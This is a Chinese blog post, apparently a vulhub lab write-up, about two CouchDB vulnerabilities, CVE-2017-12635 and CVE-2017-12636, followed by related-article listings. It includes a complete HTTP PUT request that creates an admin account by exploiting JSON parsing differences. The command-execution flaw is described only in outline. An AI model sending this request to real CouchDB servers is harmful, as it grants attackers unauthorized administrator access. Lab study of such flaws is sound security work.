Couchdb

最新推荐文章于 2024-03-05 09:06:25 发布
原创 最新推荐文章于 2024-03-05 09:06:25 发布 · 606 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#couchdb

本文深入探讨了CouchDB数据库的安全漏洞,包括CVE-2017-12635垂直权限绕过和CVE-2017-12636任意命令执行漏洞。详细介绍了漏洞原理、影响版本及利用方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Couchdb

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
使用json api进行查询

默认端口5984

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
影响版本:小于 1.7.0 以及 小于 2.1.1

向restful api发送如下数据包

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

直接访问url,用burp抓包
在这里插入图片描述
可以看到只有admin可以添加用户
发送包含两个roles的数据包,即可绕过限制

在这里插入图片描述
添加成功,用户名/密码:vulhub/vulhub登录成功
在这里插入图片描述

Couchdb 任意命令执行漏洞(CVE-2017-12636)

CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。
影响版本:小于 1.7.0 以及 小于 2.1.1

这个漏洞和上面的12635可以组成一个漏洞利用链,这个漏洞的利用前提需要登录用户,利用之前需要用之前的漏洞添加一个账号。

Couchdb 2.x和和1.x的API接口有一定区别,所以这个漏洞的利用方式也不同。

1.x

在这里插入图片描述
给query_servers添加配置的时候出现这种情况,不知道怎么解决…

2.x

2.x相比于1.x加入了集群的概念,所以修改配置的API需要增加node name。
reference:
https://www.anquanke.com/post/id/87256

Apache CouchDB: 一个开源的文档型数据库
Aaron_945的博客
08-09 1559
Apache CouchDB是一个功能强大的文档型数据库,它以其灵活性、可扩展性、高可用性和易用性等特点,在现代Web应用中得到了广泛应用。通过本文的介绍,相信你已经对CouchDB有了更深入的了解,并掌握了其基本使用和高级用法。希望CouchDB能够成为你构建现代Web应用的得力助手。
CouchDB学习-集群管理
gr32442187do的博客
12-21 702
集群管理 理论 在etc/fefault.ini文件中有以下部分: [cluster] q=8 n=3 q - 分片的数量 n - 每一份文档的拷贝数量(加上原文档一共几份副本) 创建数据库时可以通过覆盖该值修改为自己的值。 在集群操作中,获取操作中CouchDB返回状态码200或者是写操作返回状态码201即为大多数成员达成一致。大多数成员定义为相关拷贝的数量的一半。对于“读写”操作,...
CouchDB –放松
danpu0978的博客
04-17 197
介绍 Apache CouchDB,通常称为CouchDB,是一个开放源代码数据库,着重于易用性和“完全包含Web的数据库”。 它是一个NoSQL数据库,使用JSON来存储数据,使用MapReduce和HTTP作为API来将JavaScript作为查询语言来存储数据。 它的独特功能之一是多​​主复制。 Couch是不可靠的商品硬件集群的首字母缩写 CouchDB数据库缺少模...
couchdb
weixin_34270865的博客
11-15 476
1、简介 Apache CouchDB数据库,它类似于Redis,Cassandra和MongoDB,也是一个NoSQL数据库。 CouchDB将数据存储为非关系性的JSON文档。 couchdb内部通讯采用httpClient。 2、安装 https://www.w3cschool.cn/couchdb/couchdb_installation.html 1)远程访问需配置 修改/opt/cou...
CouchDb
ZCR的博客
12-11 3479
Couchdb数据库 一、介绍 1、简介 官网上的说明:CouchDb是一个存储Json文档的数据库。CouchDB是一个完全包含Web的数据库。使用JSON文档存储数据。使用Web浏览器通过HTTP访问您的文档。使用JavaScript 查询,组合和 转换文档。CouchDB适用于现代网络和移动应用程序。您可以使用CouchDB的增量复制高效地分发数据。(概括说couchedb是一个面向文档的...
couchdb-benchmarks:一些用于测试CouchDB性能的基准脚本
05-12
我目前正在这些基准测试上,以获取有关CouchDB扩展属性的第一手数据。 我特别关心磁盘使用情况(弄清楚何时需要分片)和复制速度。 但是,在此过程中,我还将收集其他可能有用的信息,但请记住,我的测试方法将明确...
CouchDB入门
qq_39581763的博客
03-20 458
一、简介Apache CouchDB数据库,它类似于Redis,Cassandra和MongoDB,也是一个NoSQL数据库。 CouchDB将数据存储为非关系性的JSON文档。 这使得CouchDB的用户可以以与现实世界相似的方式来存储数据。 可以从命令行或一个叫作Futon的Web界面来管理CouchDB。 Futon可用于执行管理任务,如创建和操作CouchDB的数据库,文档和...
什么是CouchDB
weixin_30794499的博客
07-05 264
※本文对CouchDB的解释是来自Apache CouchDB的官网的译文,如果有什么问题,请指正。 1.CouchDB简介 CouchDB是一种利用JSON文件,javascript作为MapReduce查询,以及常规HTTP作为API的一种数据库系统。 2.CouchDB,一个为Web而生的数据库 CouchDB是一个完全为了web而生的数据库,它利用了JSON文件来存贮数据。...
CouchDB简介
weixin_42117918的博客
12-16 1233
CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 “Couch” 是 “Cluster Of Unreliable Commodity Hardware” 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也...
couchdb:CouchDB-基于JSON的Web数据库
05-22
CouchDB-基于JSON的Web数据库 是一个完全包含网络的数据库。 使用JSON文档存储数据。 通过HTTP使用Web浏览器访问文档。 使用JavaScript查询,合并和转换文档。 CouchDB与现代的​​Web和移动应用程序很好地兼容。 您甚至可以直接从CouchDB中提供Web应用程序。 该设备包括所有标准功能,并且还具有: 从上游源安装的CouchDB。 包括预配置为代理CouchDB的Nginx,开箱即用的SSL支持。 包括CouchApp,CouchDB Python绑定和iPython。 CouchDB在所有接口上侦听(方便) 默认情况下,CouchDB禁用,用户管理员已启用(安全性) 包括TurnKey Web控制面板,该面板带有指向有用参考的链接,该参考由CouchDB提供,并由CouchApp构建:/ opt / tklwebcp 凭据(首次启动时
CouchDB是什么?
最新发布
unber的博客
03-05 791
CouchDB是由Apache软件基础开发的开源NoSQL数据库,它是用Erlang编程语言编写的。
apache CouchDB数据库
这里是Mae。
03-08 1082
【apache CouchDB数据库学习】 CouchDB是一种免费的、开源的、NoSQL数据库。
CouchDB快速入门
unber的博客
03-04 1297
对伸手党,需要注意的是:本教程包教不包会。
CouchDB简单入门
上烟雨心上尘的博客
10-24 286
点击Create Document建立文档。建立View,查看淘宝中各个商品的价格。123456:改成自己密码。admin: 用户名。
CouchDB介绍
yueguanyun的专栏
06-16 3708
 CouchDB介绍 2、CouchDB 介绍 Apache CouchDB 是一个面向文档的数据库管理系统。它提供以 JSON 作为数据格式的 REST 接口来对其进行操作,并可以通过视图来操纵文档的组织和呈现。 CouchDB 是 Apache 基金会的顶级开源项目。 CouchDB是用Erlang开发的面向文档的数据库系统,其数据存储方式类似Lucene的Index文件格式。C
Apache CouchDB安装及入门  
weixin_33802505的博客
05-17 712
  1. 从Apache CouchDB官网下载最新的版本,目前最新版本为1.6.1。  2. 运行“setup-couchdb-1.6.1_R16B02.exe”文件,并将couchdb设置为Windows服务,这样就不用每次都启动服务。  3. 在浏览器中运行“http://127.0.0.1:5984”,出现下面的内容说明安装成功。{"couchdb":"Welcome","uuid":"4...
CouchDB权威指南
"CouchDB The Definitive Guide" 《CouchDB权威指南》是一本详细介绍开源数据库系统CouchDB的专业书籍,由J. Chris Anderson、Jan Lehnardt和Noah Slater共同撰写。这本书深入浅出地阐述了CouchDB的核心概念、设计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值